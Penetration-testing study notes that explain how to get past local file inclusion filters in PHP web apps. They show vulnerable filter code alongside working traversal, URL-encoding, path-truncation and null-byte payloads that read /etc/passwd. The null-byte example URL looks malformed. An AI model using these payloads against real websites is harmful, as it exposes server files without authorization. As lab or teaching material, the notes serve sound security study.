BASIC BYPASSES

#non-recursive path traversal filters
$language = str_replace('../', '', $_GET['language']);

 * this "search and replace filter" is the most basic filter against LFI
    - this filter is supposed to remove all occurrence of ../ substrings
    - this filter can be easily bypassed as it doesn't apply the filter on the 
      output string
       - bypasses include: ....// ..././ ....\/ or ....////
       
#approved paths
if(preg_match('/^\.\/languages\/.+$/', $_GET['language'])) {
    include($_GET['language']);
} else {
    echo 'Illegal path specified!';                   <----------indicator
}

BYPASS: VIA NON-RECURSIVE PATH TRAVERSAL FILTER

this method is used when the target has a filter in place that removes the "../" from user input

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=../../../../etc/passwd
 
 * if an error gets displayed or nothing seems to work... it may mean that the
   back-end configuration has path traversal filter configured such as
   $language = str_replace('../', '', $_GET['language']);
    - in cases like this you may be able to bypass via escaping the ../ using ....// etc 
 
 root@oco:~$ BROWSER > {targetSite:port}/index.php?language=....//....//....//....//etc/passwd
 root:x:0:0:root:/root:/bin/bash
 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
 ...

BYPASS: VIA URL ENCODING

this method is used when the target has filters in place that disallow the "." or "/" characters from user input

root@oco:~$ burpsuite
BURP > Decoder
 input: ../../../etc/passwd
 encode as: URL
 output: %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
 
root@oco:~$ BROWSER > {targetSite:port}/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
 * the vulnerable application will decode the encoded payload

BYPASS: VIA APPROVED PATHS

this method is used when the webapp uses Regular Expressions to ensure that the file being included is under a specific path (e.g., ./languages)

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=./languages/../../../../etc/passwd

CHAINED BASIC BYPASS TECHNIQUE

this method is used if the web applications applies multiple filters such as "approved paths", "disallowing file inclusion characters", and "path traversal filters". attackers may be able to bypass the filters by combining all basic bypass techniques; starting with approved path, and then URL encode or recursive payload

root@oco:~$ BROWSER > http://94.237.54.231:31635/index.php?language=languages/....//....//....//....//etc/passwd
 * this technique combines an approved path with non-recursive filter technique
    - approved path and character URL encoding could also have been used

BYPASS: APPENDED EXTENSION

some webapps appends an extension to the input string to ensure that the file the attacker is including is in the expected extension (e.g., .php).

VIA PATH TRUNCATION

this will only work on only work with PHP versions before 5.3/5.4. also for this technique to work, attackers will need to start the path with a non-existing directory and must have a total of 4096 characters payload length to ensure only the .php extension gets truncated and not the requested file at the end of the string (e.g., /etc/passwd)

root@oco:~$ echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done

root@oco:~$ BROWSER > {targetSite:port}/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]

VIA NULL BYTES

PHP versions before 5.5 is vulnerable to null byte injection. this is where adding a null byte (%00) at the end of the string would terminate the string and not consider anything after it. this technique worked due to how strings are stored in low-level memory, where strings in memory must use a null byte to indicate the end of the string, as seen in Assembly, C, or C++ language.

root@oco:~$ BROWSER > {targetSite:port}/index.php/etc/passwd%00.php
 *  anything after the null byte (%00) would be truncated, and so the path used would 
    actually be /etc/passwd, leading to the bypass of appended extension.

Last updated